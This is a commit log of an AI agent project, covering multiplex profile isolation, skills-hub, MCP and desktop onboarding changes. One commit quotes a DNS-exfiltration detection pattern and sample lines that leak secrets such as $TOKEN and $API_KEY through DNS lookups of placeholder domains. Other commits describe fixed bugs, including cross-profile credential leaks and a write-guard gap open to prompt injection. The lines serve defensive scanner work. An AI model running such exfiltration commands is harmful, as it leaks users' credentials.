dfd4aa4a94c726c8dab9efcb6dfb2c375e986dd2
2999 Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
|
|
02b398bda5 |
fix(mcp): recovered application errors keep the breaker strike
The pick returns the real result after a transport recovery instead of
dropping it, but it also skipped the breaker bookkeeping. Application
errors counting as strikes is the point of the breaker (
|
||
|
|
5dca47a651 | fix(mcp): preserve application results after transport recovery | ||
|
|
850c48cd84 |
feat(skills-hub): tap K-Dense and OpenScience scientific skills under one "science" bucket
~480 scientific research skills become searchable/installable through the Skills Hub with nothing vendored: K-Dense-AI/scientific-agent-skills (165, MIT) and synthetic-sciences/openscience (314 across 17 category paths, Apache-2.0). A new optional tap-level `bucket` key stamps extra["category"] on every skill from a tap whose repo ships no skills.sh.json grouping, so several repos surface as one hub category; a sidecar grouping still wins when present. Both repos stay at community trust (not in TRUSTED_REPOS) so the guard scans every install. Re-grafted from #60559 onto the post-split tools/skills_hub_github.py. |
||
|
|
e7794124da |
fix(skills-index): bound ClawHub owner enrichment so the scheduled index build finishes
Every scheduled skills-index.yml run since 2026-07-20 was cancelled at the 15-minute job timeout, so the live skills-index.json has been frozen at that date and every `hermes skills search` fell through to live GitHub API calls (~500 inspect requests per cold search, against a 60/hr unauthenticated budget). The freshness watchdog has been appending to #66616 four times a day since. Root cause: enrich_owners() walks every ClawHub skill's detail endpoint (~2s each) to fetch an owner handle for the "View source" link. The catalog grew from ~50k to 78k skills, so even at 30 workers that phase alone runs over an hour; nothing bounded it. - enrich_owners() gains budget_seconds: on expiry it stops and ships the remainder without an owner (the link is a nicety; the index is not). - build_skills_index.py passes an 8-minute budget. - skills-index.yml build job timeout 15 -> 50 min to cover the measured critical path (clawhub walk ~14 min || github taps ~8 min, skills.sh resolve ~6 min, enrichment 8 min). |
||
|
|
e705dde6e4 | chore(tests): pass encoding=utf-8 in test_skills_guard file writes (windows-footgun ratchet) | ||
|
|
596bd8fec6 |
fix(skills_guard): dns_exfil no longer fires on the English noun "host" in prose
`(dig|nslookup|host)\s+[^\n]*\$` matched any line where the word "host"
was followed, anywhere later, by a `$` -- "Set the host value and run
`${SKILL_DIR}/scripts/check.py`" was a CRITICAL DNS-exfiltration finding
that blocked a one-file community skill from installing (#108873).
DNS exfiltration puts the data in the queried NAME, so the pattern now
requires the interpolation in the first positional argument (after
optional -flags with values, +opts and @server). Real `host $SECRET.x`,
`dig @1.2.3.4 +short $TOKEN.x`, `nslookup -type=txt "$KEY".x` and
`host -t txt ${API_KEY}.x` still flag; the llama.cpp `--host ... $PORT`
exemption is preserved.
|
||
|
|
4b8c01f691 |
fix(multiplex): key tool-side and agent-side memos by profile home
Camofox VNC one-shot, computer-use aux-vision verdict, tirith binary path, MCP discovery lock path, remote-backend probe text, learned image token costs, auxiliary per-task semaphores and the custom-endpoint /models memo all held one profile's config-derived value for the whole process. The skill-sync debounce Timer ran with empty ContextVars, so a secondary's write pushed as the launch profile (and cancelled its pending push). Each memo is now keyed by hermes_home_key() (or credential fingerprint for the per-key catalog) under an override; the timer is per home and runs its callback inside the scheduling turn's copied context. Unscoped slots are unchanged. |
||
|
|
4f1966edac |
feat(desktop): connector cards that wait for the sign-in, and a guided first launch that holds together (#108292)
* feat(desktop): give Button a loading prop that swaps label for spinner without layout shift The label stays in the box, invisible, and the spinner is absolutely centred over it, so a Connect or Approve button keeps its width while it works instead of collapsing to a spinner. The approval bar had the same thrash and moves onto it. * refactor(desktop): one consent card for connectors and MCP setup McpSetupTool rendered its own copy of the connector card's markup. It now renders ConnectorCard for the pending question and ConnectorSummary once settled, and the card gains what MCP needed: keyboard accelerators, a source line, a question heading. The card also gets an avatar variant (40px mark in the left gutter, text and buttons on one column) and a collapseWhenSettled switch so a connector can stay a full card with a green Connected pill in the action slot while MCP keeps its one-line summary. Brand marks for Gmail, Calendar, Drive, Discord, Telegram and Spotify; Slack via Tabler because simple-icons dropped the mark. * feat(desktop): connector card drives the agent through manage_connections wait The offer used to end in a Continue in chat button, and the agent, seeing an unconnected status, would improvise around the app. Now the card does what the TUI does. Clicking Connect opens the browser and sends one hidden line telling the agent to park in manage_connections action=wait for that slug and to never call connect again (a second link cancels the one being signed into). Not now sends its own line. A hidden request that lands while the turn is busy steers it, or queues if the turn just ended. Which call owns the live card changes too: consecutive calls naming the same apps are one exchange (connect, the wait, the status that follows), and the first of the last exchange is the card, so the agent's wait no longer demotes the card mid-authorization and mints a fresh one below it. A targeted ask renders one or two bare cards; only a real catalog gets the header, search and refresh. * feat(desktop): onboarding connects apps in chat and keeps tasks finishable without them The welcome chat knew connectors only as preferences to pick and wire up later, so asked to connect Gmail it invented a Settings page that does not exist. Both scripts now carry one rule set: status once, one batched connect for every app named, the card is the ask so write a line and end the turn, never route around a declined app with another client or credential. The build handoff checks real connection status instead of asserting none are connected, and the first task must be finishable, not free of, the apps they picked. The connectors card explains what connecting means and reports the count on its Continue button. * fix(tools): resolve the Nous identity for share_auth profiles in the connector gate A profile created with share_auth has no auth.json of its own and signs in through the root store. Every other credential reader falls back to the global root; the connector gate read HERMES_HOME/auth.json directly, saw nothing, and stripped manage_connections from the profile's tool list, so the welcome chat's agent truthfully reported the tool missing. The gate now goes through get_provider_auth_state. * fix(agent): name a provider retry backoff on the live status line The retry status is buffered and replays only when every retry fails, so during a 60s backoff after a 5xx the user saw a bare spinner. Right after a connector sign-in landed this read as the agent going silent. The backoff now also rewrites the live wait notice, which the desktop already renders in the thread status row; it is transient and clears on recovery. * test(desktop): connector rehearsal launcher and flagged connector spec connector-rehearsal.mjs starts the real desktop and backend under a fresh HERMES_HOME with no copied credentials, a fixed Vite port and CDP on 9344, so the onboarding connector flow can be driven end to end by hand or from outside. The Playwright spec covers the flagged connector step. * fix(desktop): send the agent back into wait when the user keeps waiting after a timeout The card's Keep waiting re-entered the poll but the agent's own wait had timed out too and nothing told it to go back in, so it would start talking mid-authorization. keepWaiting now fires onWaiting like connect does. Tests also pin that an expired or revoked grant asks the gateway for reconnect, not connect. * style(desktop): blank lines in connector-flow test per lint * feat(desktop): HERMES_SKIP_INTRO=1 / --skip-intro skips the first-run film The intro is a one-time reveal, so anyone rehearsing the guided chat behind it sits through it on every fresh HERMES_HOME. The flag rides the existing launch-flags path (main → preload → renderer) next to guestOnboarding and only gates isIntroRevealEnabled; the backend never sees it. The rehearsal launcher sets it. * fix(desktop): onboarding card Continue stays Done after the transcript rebuilds The card kept its Done flag in component state. The hidden submit and the turn-end hydrate both rebuild the message list, so the card remounted with the flag false and Continue came back live, letting a step be answered twice. The committed steps now live with the other onboarding answers, keyed by step, and the first-build chip pick rides the same store. remember_onboarding projects by key, so the new field never reaches USER.md. * fix(desktop): no provider picker or free-tier chip over the guided first launch Two sign-in surfaces leaked into the guide. A credential probe on the setup profile (a free-tier token mid refresh, a session before its runtime settled) hit requestDesktopOnboarding and dropped the provider picker over the chat the user was in; and the statusbar free-tier chip sat there offering a second sign-in the whole time. Both now yield while the gate phase is cinematic, guided or handoff. The free tier is the provider for those phases, and the guide offers sign-in on its own ready screen. * fix(desktop): onboarding connector picks are real catalog slugs The picker offered Spotify, GitHub and Stripe, none of which the deployed connector catalog carries, and spelled Calendar and Drive with hyphens the gateway does not use. A pick the build chat could not honour ended as "Spotify isn't in the connector list" after the user had been told to expect it. The list is now twelve slugs from the live status catalog, spelled as the gateway spells them; GitHub is out (the terminal has git and gh), chat channels stay on Messaging. Marks for the new entries; the Google marks answer both spellings. The build runbook offers the picked connections in its first turn rather than after the work is underway. * fix(desktop): the free-tier ready screen never interrupts the guided chat A readiness round fires when the layout pick assembles the window, and it raised the free-tier ready screen over the conversation: the user was dropped into the main app, dismissed it, and came back to a card they had already answered. The guide is the introduction. The ready screen now yields while the gate is cinematic, guided or handoff, and the notice is acked the moment the guided chat takes the screen, not only when the film does, so a skipped film no longer leaves it pending. * feat(desktop): tour options that lead to building, and a fork that follows the tour "Just the basics" and "Show me around" read as a click-through with no exit; "I'll figure it out" read as declining help. Now Quick tour, Show me everything, and Skip, let's build something. The script also folds the fork into the same turn as the tour, so when the user closes the overlay the next ask is already waiting instead of a transcript that ends on the tour call. * feat(desktop): the onboarding connector picker reads the live catalog A hardcoded list, however carefully copied from today's catalog, is the next drift. The picker now asks connectors.list through the same session-owned RPC the connector cards use and offers exactly what the gateway carries: a curated lead order puts the everyday apps first, chat channels stay on Messaging, everything else is reachable by search. The picks are gateway slugs, handed straight to manage_connections. No catalog (toolset off, gateway unreachable) ends the step honestly with Skip instead of inventing apps. * test(desktop): the guided first launch never forces a sign-in The acceptance criterion the guided onboarding was built to, as a test: while the gate is cinematic, guided or handoff, the provider picker does not open and a credential warning is dropped rather than deferred to the next send. Outside the guide the picker opens as before. Red against the tree before the guards landed (6 of 9). * fix(desktop): a relaunch mid-guide resumes the guide, in the guide's shape Closing the app during the guided first launch and reopening it booted the normal shell around the persisted solo layout: the connecting splash, the stock composer and model picker, a small window whose sidebars would not open, while the gate still read guided. The gate now queues a kickoff for the guided phase too (the kickoff adopts the existing guide chat by title), takes the solo shape before the gateway opens rather than after, and the connecting overlay yields to the guide's own opening. A typed reply in the composer now closes an ask card and the first-build chips the same way a click does; the layout card's Continue comes back Done. * style(desktop): one answeredAfter helper for the ask card and first-build chips * fix(desktop): the guide takes its shape on the tick the film ends, not after the window shows Between the film and the greeting the full-size shell painted for a beat: finishIntroReveal showed the main window, then the kickoff shrank it once the setup profile answered. The listener on the intro's hidden edge now takes the guide's shape (solo layout + small centred window) synchronously, so the window is already the guide when it is shown. One takeGuideShape owns the pair; kickoff and the boot gate call it idempotently. * style(desktop): the 'nothing connects yet' line reads first on the connectors card |
||
|
|
fc71fb63e5 |
test(multiplex): invariants for the residue fixes; retire allowlist tests
- tests/gateway/test_multiplex_residue_parity.py: served profile reads its own sessions.*; per-turn bridge skips secondary scope; resolve_proxy_url reads the routed scope (and does not borrow the default's on a miss); a stale served turn never recreates an archived profile; MCP discovery runs per profile home. - test_config.py: v43 migration removes multiplex_profile_allowlist. - Allowlist tests deleted (feature removed) or rewritten to "served set = all live profiles"; the unserved cases now use a tombstone / missing dir. - MCP discovery fixtures converted to the per-home set/dict slot. |
||
|
|
9c9e7ab6e5 |
fix(multiplex): a served profile's turn sees its own cwd, approvals, redaction and tool policy
Under gateway.multiplex_profiles a secondary profile's turn ran with the LAUNCH profile's working directory, command allowlist, redact_secrets switch, credential file mounts, browser engine/headed flags, LSP service, auxiliary-provider health marks and MCP stderr log, and several TERMINAL_ENV consumers read the process env instead of the routed profile's terminal scope. A standalone `hermes -p X gateway run` never behaved that way. - tools/terminal_scope.py: resolve the terminal.cwd placeholder inside the profile scope with the same rule gateway/run.py applies at import (local -> $HOME, sandbox default otherwise) so the system prompt, context files and the terminal of a routed turn start where the profile's standalone gateway would. - tools/image_source.py, credential_files.py, image_generation_tool.py, skills_tool.py, delegate_tool_progress.py, agent/tool_executor.py: read TERMINAL_ENV / TERMINAL_CWD through the terminal scope. - tools/approval.py (+ approval_floors.py): one permanent allowlist per routed profile home; the unscoped module set stays for single-profile processes. - agent/redact.py: `_redact_enabled()` resolves security.redact_secrets for the routed profile (scope .env, then config); launch snapshot kept when unscoped. - tools/credential_files.py, agent/auxiliary_health.py, agent/lsp/__init__.py, tools/browser_tool_cloud.py, tools/mcp_tool_config.py, tools/tool_result_storage.py: key process caches by profile home (or bypass the slot under an override). Tests: tests/tools/test_multiplex_turn_parity.py (4, red on base). Docs: multi-profile-gateways.md isolation table. |
||
|
|
adf23550f5 |
fix(tools): profile-scoped checkpoint/snapshot paths, tool caches, TZ and schema paths under multiplex
Under `gateway.multiplex_profiles` one gateway process serves every profile
under ~/.hermes/profiles/NAME/; each routed turn runs with a context-local
HERMES_HOME override while `os.environ` still holds the DEFAULT profile's
values. Anything evaluated once at import, or memoised in a single unkeyed
module slot, therefore freezes the LAUNCH profile's value and leaks it into
every other profile's turns. This lands the tools-side half of that class:
- tools/process_registry.py, tools/environments/{modal,singularity}.py:
`_checkpoint_path()` / `_snapshot_store()` resolve `get_hermes_home()` at
call time (same seam as `tools/skills_tool._skills_dir`, so the existing
`monkeypatch.setattr(CHECKPOINT_PATH)` test sites keep working). Completes
the checkpoint_manager / sticker_cache half cherry-picked from #56315.
- plugins/platforms/feishu/feishu_comment_rules.py: `_MtimeCache` is now
path-keyed (accepts a Path or a zero-arg resolver, one (mtime, data) slot
per resolved path) with `invalidate()`; `_rules_file()` / `_pairing_file()`
resolve the routed profile's files. Proposed in #63962.
- tools/tool_output_limits.py, tools/browser_tool.py, tools/browser_camofox.py:
the process-lifetime config caches are dicts keyed by `hermes_home_key()`;
the `_X_resolved` flags and the lifecycle reset keep their shape.
tools/file_tools.py drops its private `file_read_max_chars` memo and reads
the already mtime+path-cached `load_config_readonly()`.
- hermes_time.py: `get_timezone_name()`; when `is_multiplex_active()` the
env `HERMES_TIMEZONE` (bridged from the default profile's config at gateway
startup) is ignored in favour of the routed profile's config.yaml. Both
sandbox TZ sites (code_execution_env/_tool) now use it.
- tools/cronjob_tools.py, tools/tts_tool.py, tools/skill_manager_tool.py:
the static schema text is profile-neutral and `dynamic_schema_overrides=`
rebuilds the `display_hermes_home()` / create-dir hint per
`get_definitions()`, so a routed profile's model sees its own paths.
Refs #95685.
Co-authored-by: Nathan Shan <nathanielcrush51@gmail.com>
(cherry picked from commit 6d3fc6b07b3155c6196b1fd61a829283f1d7855c)
|
||
|
|
72cc96578a | test: trim salvaged multiplex tests to the invariant pair per fix | ||
|
|
388b881b33 |
fix(gateway,tools): per-profile Yuanbao home, env_passthrough allowlist and Slack ignored-channel guard under multiplex
- gateway/platforms/yuanbao.py::AutoSetHomeMiddleware: the first authorized DM to a SECONDARY Yuanbao bot wrote YUANBAO_HOME_CHANNEL into os.environ, making that tenant's chat the default profile's cron/notification home. The write now only happens unscoped; reads go through the scoped reader + config. - tools/env_passthrough.py::_config_passthrough: one module slot froze the first profile's terminal.env_passthrough for every profile's sandbox children; keyed by hermes_home_key(). - gateway/run.py::_slack_ignored_channels_from_gateway_config: the runner-level fail-safe only had the DEFAULT profile's GatewayConfig, so a secondary Slack bot's traffic was judged by the default's ignored list. It now takes the source's routed adapter (whose extra is the secondary's own config) and reads the env fallback through the scoped gate reader. |
||
|
|
7af5006b24 |
fix(file-safety): bind the write-guard resolver fallback to the active profile
The per-call home/config getters fell back to `_expand_tilde("~/.hermes...")`
when the primary resolver raised. `_expand_tilde` follows the subprocess-HOME
contract, which under host `auto` mode can be the real/default user home rather
than the active multiplex `HERMES_HOME`. So on the exception path the guards
recreated the very cross-profile authority bug the happy path fixed: beta's
`config.yaml` was compared against the default/root config (hard-block fails
open), and the protected-instruction exemption resolved against the wrong home.
Re-derive both fallbacks from the same `get_hermes_home()` key the happy path
uses (`Path(home)/config.yaml`, `realpath(home)`), and substitute no unrelated
home if the active security path cannot be established — a `None` fails closed
at the protected-instruction consumer (exemption skipped, gate runs).
Adds opposite-side regressions: forcing the primary config resolver to raise
keeps beta's own config refused (and does not spuriously protect alpha's under
beta's scope); forcing the primary home resolver to raise keeps beta's
instruction-file exemption resolved against beta.
Addresses the fallback-authority review on #107335 (thanks @andrexibiza).
(cherry picked from commit 119d88b46f745ba081f12adf3f6ebba457d95d68)
|
||
|
|
1271622e4b |
fix(file-safety): resolve HERMES_HOME/config per call so multiplex profiles don't poison the write guards (#107327)
In a multiplexed gateway (`gateway.multiplex_profiles: true`) each profile turn scopes `HERMES_HOME` through a per-turn contextvar. But `tools/file_tools_write_guards.py` memoised the resolved home and config path in process-global module state, filled once by whichever profile ran first. Both the protected agent-instruction approval gate (`_get_real_hermes_home` → exemption for a profile's own home) and the `config.yaml` hard-block (`_get_hermes_config_resolved`) therefore became order-dependent: a later profile's own `workspace/AGENTS.md` was gated against a *sibling* profile's home, and — worse — its own `config.yaml` stopped matching the block, so a prompt-injected agent could rewrite the very file the block exists to protect (reproduced end-to-end in #107327). Resolve both values per call instead. `get_hermes_home()` / `get_config_path()` are contextvar-scoped, so the getters now track the active profile; the guard already pays a `realpath` per call, so the extra cost is negligible. The two module slots are kept purely as a test-override surface (set the slot + its `_loaded` flag to pin a value); production leaves them unset and resolves live, which also removes the cross-test poisoning the process memo could cause. Adds regression coverage: both getters track the active profile after a prior profile's scope, and the `config.yaml` hard-block fires for beta's own config even after an alpha turn ran first. (cherry picked from commit 36b257391da497ac31e6c440727dc57ecd584e71) |
||
|
|
606903badc |
fix(tui): bind launch-profile terminal scope once multiplexing is active
After any secondary profile home is served, launch-profile turns used to stay unscoped and fall back to ambient os.environ. Bind the launch home's own terminal policy in that case so a poisoned ambient bridge can never become the launch turn's authority (#107422 residual of #68559). (cherry picked from commit f81147c1e5d283837e5e27f4da79710da7025235) |
||
|
|
a5c801c8dc |
fix(tools): never ambient-bridge TERMINAL_* under a profile home override
A multiplexed dashboard can call _ensure_terminal_env_bridged while a secondary profile's HERMES_HOME override is active. The one-shot latch then wrote that profile's docker policy into process-global os.environ and poisoned later unscoped launch-profile tool calls (#107422). Skip the ambient bridge whenever a context-local home override is set — ambient env is launch-profile authority only; routed profiles must use terminal_scope (same rule as env_loader._reapply_terminal_config_bridge). (cherry picked from commit 2050efb24fdc9d54a282b24d0042b90f47486c5a) |
||
|
|
ceaf622c6d |
fix(mcp): same-named MCP servers with different credentials connect per profile; owner /reload-mcp keeps adopters' tools
Under gateway.multiplex_profiles every connection ledger in tools/mcp_tool.py
(_servers, _server_scope_keys/_server_tool_scopes, connecting/error/cooldown
maps, the circuit breaker, lazy schema-cache configs, trust metadata) was keyed
by the bare server NAME. The common per-tenant layout — each profile names its
server `github`/`notion` with its own token — gave only the first profile a
connection: the second profile's register_mcp_servers saw the name as "already
connected", refused to adopt it (different credentials,
|
||
|
|
a9838c2100 |
fix(multiplex): tool and memory-provider env reads stay inside the routed profile
Under gateway.multiplex_profiles, os.environ holds the DEFAULT profile's .env; a
secondary profile's values exist only in the per-turn secret scope. Every reader
below still read os.environ/os.getenv at call time, so a secondary profile's turn
silently used the default profile's value.
Credentials (F6): FIRECRAWL_API_KEY (read_file hosted OCR), OPENVIKING_API_KEY,
mem0-OSS OPENAI_API_KEY, MODAL_TOKEN_ID/SECRET and BROWSER_USE_API_KEY presence
gates, and the xAI video plugin's os.getenv("XAI_API_KEY") fallback AFTER the
scoped resolver had already missed — the exact fallback-after-miss shape
gateway/AGENTS.md forbids. Deleted, not re-scoped: the resolver is the scope.
Identity / tenant (F7): MEM0_USER_ID/AGENT_ID/HOST/MODE, SUPERMEMORY_CONTAINER_TAG,
RETAINDB_PROJECT, OPENVIKING_ACCOUNT/USER/AGENT (and the whole layered() env
read), HINDSIGHT_BANK_ID/MODE/retain shaping, HERMES_HONCHO_HOST. A raw read
put a secondary profile's memories into the default profile's account/bank/
project/tenant and recalled them back into the default's turns. Each now uses
get_secret with the provider's own per-profile default on a miss.
Endpoints (F8): OPENAI_BASE_URL (aux custom runtime + direct-alias expansion),
XAI_BASE_URL/HERMES_XAI_BASE_URL (aux OAuth), NOUS_INFERENCE_BASE_URL (#65941,
both the aux builder and hermes_cli.auth_nous._nous_inference_env_override),
GATEWAY_PROXY_URL (same UnscopedSecretError-only fallback shape as
GATEWAY_PROXY_KEY three lines below), FIRECRAWL_API_URL, BROWSERBASE_BASE_URL,
SUPERMEMORY/RETAINDB/HONCHO/HINDSIGHT URLs. The keys beside them were already
scoped, so a secondary's key was sent to the default profile's proxy or host.
Targets / display (F11): WEIXIN_HOME_CHANNEL (message posted into the default's
chat), HERMES_LANGUAGE, and agent/i18n's process-wide lru_cache of
display.language — now keyed by HERMES_HOME.
Outbound webhooks: hooks.outbound[].secret_env resolved from os.environ while
the gateway registers each profile's targets inside that profile's scope, so a
secondary's deliveries were signed with the default's secret or left unsigned.
Agent-cache eviction: _spawn_release_thread started a bare threading.Thread, so
commit_memory_session -> provider on_session_end ran with an EMPTY context. The
thread now runs copy_context() and, for the unscoped housekeeping sweep, enters
the owning profile's _profile_runtime_scope resolved from the session key
(agent:<profile>:...). The pressure batch does the same per key.
session_search (#82903): agent/inline_tool_executors.py::_session_search
forwarded every schema argument except `profile`, so a gateway agent could
never select a named profile's store. Forwarded; the ownership-scoping design
in #87779/#87847 is a separate design call and is not attempted here.
Live repro (/tmp/mux_audit/fix-tool-memory-reads/repro.py): 28 FAIL on
origin/main -> 0 FAIL with this change; 10 new invariant tests red on base.
Fixes #82903
Fixes #65941
Fixes #99121
Addresses #87779
Co-authored-by: webtecnica <75556242+webtecnica@users.noreply.github.com>
Co-authored-by: Michael Versluis (Berry) <michael@wve.nl>
|
||
|
|
0dcadf6f41 |
revert: remove Collective Wisdom V1 (#94266)
Reverts the in-tree org skill-marketplace: hermes_wisdom package, three model tools, CLI/gateway/desktop/dashboard/Telegram/Slack surfaces. Later non-Wisdom work on shared files (guest onboarding i18n, dashboard startup schema, Slack adapter, tui_gateway) is kept; Wisdom-only call sites and config were stripped from those files. |
||
|
|
df1388e77b |
test(tools): extend the delegation fd-leak injection to the schema replay
The schema initializer now replays SCHEMA_SQL through executescript (the single-authority path from #94701's follow-up), which bypasses the execute()-level DDL failure injection — the regression stopped raising. Bind the same simulated failure onto the executescript path so the connect-close-on-init-failure contract stays pinned for both replay mechanisms. |
||
|
|
df0eed4f6b |
fix(session_search): a bare session id never reads another profile's state.db
Reading a session by id that missed the caller's store fell through to _locate_session_db(), which opened every profile's state.db read-only and returned the first owner's full transcript — no opt-in, no profile named, and the miss path even fired after an explicit non-matching profile= read. Any caller holding an id (ids appear in logs and tool output) could read a foreign profile's conversation. Profiles are isolated islands by design. A miss now stays a miss, with a hint to name the owning profile (profile=<name> / @session:<profile>/<id>), which remains the sanctioned, explicit cross-profile read. The schema eval runner no longer needs to fake the scan. Reported by the #106761 filer; reproduced by @kokhlo. Refs #87779. |
||
|
|
a6ee31f55a |
feat(wisdom): add Hermes Collective Wisdom Agent V1 (#94266)
* feat(wisdom): add trusted publish and install foundation
* feat(wisdom): add private contribution loop
* feat(wisdom): add managed consumption workflows
* fix(wisdom): close cross-repository safety gaps
* fix(wisdom): align local package and lifecycle policy
* fix(wisdom): require explicit profile setup
* docs(wisdom): repin reconciled gateway head
* fix(wisdom): fence content downloads and approval receipts
* docs(wisdom): record generation-fenced downloads
* docs(wisdom): record unified delivery PR
* fix(ci): stop passing invalid classifier inputs
* docs(wisdom): remove internal requirements ledger
* feat(wisdom): localize dashboard and desktop copy
* feat(wisdom): complete local contribution and consumption UX
* style(wisdom): satisfy desktop lint
* chore(wisdom): refresh requirements pin
* test(dashboard): allow formatted profile copy
* test(wisdom): stabilize desktop interaction coverage
* fix(wisdom): surface dashboard action failures
* fix(wisdom): add repeatable Portal demo login
* feat(wisdom): add actionable skill notifications
* feat(wisdom): add notification install and update actions
* fix(wisdom): make Telegram skill alerts actionable
* fix(wisdom): always refresh demo Agent login
* feat(wisdom): embed Telegram notification actions
* fix(wisdom): preserve Telegram notifications after actions
* fix(wisdom): keep Telegram notification cards readable
* feat(wisdom): add Telegram candidate approval flow
* feat(wisdom): explain Telegram qualification reasons
* fix(wisdom): reconcile cross-surface candidate actions
* feat(telegram): add Collective Wisdom management command
* chore(wisdom): refresh Gateway contract pin
* chore(wisdom): advance Gateway contract pin
* feat(wisdom): align command UX across clients
* feat(slack): add Collective Wisdom management parity
* feat(wisdom): add security and professionalism reviews
* feat(wisdom): add first-time qualification guidance
* feat(wisdom): simplify qualification sharing choices
* feat(skills): add optional editorial metadata
* feat(wisdom): enrich legacy skill presentation
* fix(wisdom): harden review and update boundaries
* fix(wisdom): emit canonical review timestamps
* fix(wisdom): align with merged gateway and main
* wisdom: add agent-led sharing core (policy, evidence, schemas, templates, delivery, weekly job, share/install flows)
- hermes_wisdom/agent_led/: policy resolution (server > local > defaults),
7-day evidence builder that excludes bundled/hub/managed skills and
dismissed/handled/recently-suggested content hashes, strict pydantic
schemas for agent output with repair-or-reject, fixed copy templates
(Share / Teammate / Published / Update / Mute), idempotent retried
delivery ledger with stale-action resolution, weekly review job,
resumable Share and Install flows.
- prompts/: candidate review, recipient recommendation, share packaging.
- tests/wisdom/test_agent_led.py: 30 tests.
* wisdom: agent-led renderers and button action dispatcher
- render.py: Telegram HTML, Slack blocks, Desktop payload; editorial name
is the emphasized line, product label stays separate.
- actions.py: resolve opaque wa:<action>:<dedup> targets via the delivery
ledger; Not now -> dismissal, Mute -> fixed options, Share -> resumable
packaging flow, Install/Update -> plan command. Never publishes/installs.
* wisdom: CLI verbs, agent_led config default, conversational catalog skill
- hermes wisdom browse/review-week/act/share/dismiss/mute (all --json).
- wisdom.agent_led config block, default enabled.
- SKILL.md rewritten so natural-language catalog questions map to the CLI
verbs, share/install flows and fixed notification templates.
* wisdom: wire agent-led weekly review into gateway tick and Telegram buttons
- gateway housekeeping tick calls maybe_run_weekly_review with a home
channel sender when a Telegram adapter is available.
- Telegram: wa: callbacks resolved through the ledger (stale-safe), mute
duration keyboard, send_wisdom_agent_recommendation rich card + fallback.
* fix(wisdom): integrate local mediation and harden model and setup boundaries
* fix(wisdom): honor authoritative recommendation policy and defer on failure
* fix(wisdom): synchronize opaque suppression and recheck delivery preferences
* feat(wisdom): route weekly selection through the session-owned assessment queue
* fix(wisdom): prepare and submit the reviewed generated share package
* feat(wisdom): separate native Share preparation from publication consent
* feat(wisdom): sync native mute choices through a leased preference outbox
* feat(wisdom): bind native mute controls to durable preference choices
* feat(wisdom): add scoped desktop and dashboard notification settings
* fix(wisdom): revalidate feed recommendations before assessment and delivery
* fix(wisdom): persist validated delivery receipts before completing notices
* feat(wisdom): add private notification claim and receipt client
* Persist Wisdom send reservations and recover delivery acknowledgements
* Route legacy Wisdom controls through current native review
* Add typed private Wisdom operation outcome client
* fix(wisdom): make agent-led advice usable in the local demo
* fix(wisdom): keep requested consent outside proactive limits
* fix(wisdom): distinguish unavailable assessments and preserve digest text
* fix(wisdom): assess ongoing usefulness beyond the current task
* fix(wisdom): restore immediate qualification sharing controls
* fix(wisdom): separate qualification review from installation advice
* fix(wisdom): collapse review checklists and simplify sharing copy
* fix(wisdom): show compact sharing progress and publication receipts
* fix(wisdom): require credential prefixes rather than matching skill names
* fix(wisdom): finish package checks before presenting sharing consent
* fix(wisdom): scan local skills before qualification cards
* fix(wisdom): update moderation results on existing sharing cards
* fix(wisdom): keep sharing review accessible from receipt cards
* fix(wisdom): align mediated review cards and collapsible checks
* fix(wisdom): clarify clean security summary wording
* fix(wisdom): normalize consent plans and add explicit recheck
* fix(wisdom): keep install and update receipts concise
* fix(wisdom): collapse assessments and deduplicate operation cards
* fix(wisdom): restore private Portal review from native cards
* fix(wisdom): sync Portal publication to original consent card
* fix(wisdom): show local skill version on sharing cards
* fix(wisdom): skip agent recommendations for self-published versions
* fix(wisdom): simplify candidate notices and local-edit recovery copy
* feat(wisdom): submit locally reviewed packages with one confirmation
* feat(wisdom): expose safe receipt and outcome sync recovery
* wisdom: onboarding notice says detect and share, names the user's own skill
Copy review from the product owner on the first and returning
qualification notices (fixed delivery mode):
- the feature blurb now says the org enabled detection *and sharing*
- both notices say the detected skill is one the user created
- both close with an exclamation mark
Applied identically to hermes_wisdom.notice, the desktop and web i18n
strings, and the tests that assert the sentences.
* wisdom: one opener, no approval line, ask to share after the skill is shown
Product owner review of the candidate card.
- The Hermes written card now opens with the same sentence as the fixed card
("Your organisation has enabled Collective Wisdom, a feature designed to
automatically detect and share useful skills across all team members.")
instead of its own blurb, so there is one first time message.
- "Nothing is shared without your approval." removed from Telegram, Slack
and Desktop. The buttons already make the permission explicit.
- "Would you like to share?" no longer appears before the skill is named.
It is now the last line, after the skill name, description, why suggested
and the checks, and reads "Would you like to share it?" (matching the
agent led template wording).
Tests updated for the new order; proposalNotice removed from all desktop locales.
* wisdom: American spelling, organization
Product owner decision: user facing copy uses American spelling.
Changes "Your organisation" to "Your organization" in the chat notice,
the Hermes written card opener, the desktop and web strings, and the
tests that assert them. Identifiers such as nas_organisation:* and the
German and French locales are untouched.
* wisdom: candidate card copy round 4 (owner review)
Apply the product owner's round 4 copy decisions to the Hermes Collective
Wisdom candidate card on Telegram, Slack, Desktop and the shared views:
1. Hermes-written cards are titled "Hermes Collective Wisdom" instead of
the bare "Collective Wisdom".
2. The "Reusable skill ready to review" line is gone from the candidate
card (Telegram rich card and plain fallback, legacy agent-led share
template).
3. The skill name and description are labelled: "Skill name: <name>" and
"What it does: <description>" (Telegram, Slack, Desktop).
4. "Why suggested:" is now "Why others might benefit:".
5. A passing professionalism review reads "Safe to share at work ✓ (no
inappropriate content found)" with no per-check bullets and no "Pass";
a failed review reads "Needs a look before sharing at work (possible
inappropriate content)" and lists only the checks that flagged
something. Pending/unavailable wording is unchanged.
6. Telegram button toasts: "Will ask later...", "Preparing more
details...", "Sharing...".
7. Qualification reasons: "You used this skill consistently across many
days." and "You've really refined this skill."
8. prompts/wisdom_candidate_review.md asks for a compelling
editorial_name, a simple one_line_description and a compelling
why_coworkers_benefit under 300 characters; "Be concise and
convincing." becomes "Be concise and compelling: the goal is that the
user wants to share it."
Tests updated for the new strings; review_text() gains direct coverage.
* wisdom: re-apply owner copy after rebase
- Native share cards (advice_view/interaction_view): drop the approval line, ask "Would you like to share it?" as the last line after the checks
- Hermes-written completion card titled "Hermes Collective Wisdom"
- Qualification reasons use the owner wording (consistently across many days / really refined)
- American spelling (organization) in remaining English copy
- Desktop test asserts the current Share button; web test matches the returning notice
* fix(wisdom): pin reconciled Gateway and verify Unicode hash vectors
Pin Gateway 60cd2d6b613ae3cd4a6e65155d1142006d907e78 and byte-identical producer artifacts. Verify every content-order case and package-manifest binding. Validation: 186 focused Python tests, Ruff and contract verifier.
* fix(wisdom): reconcile optional SDK tests and frontend lint
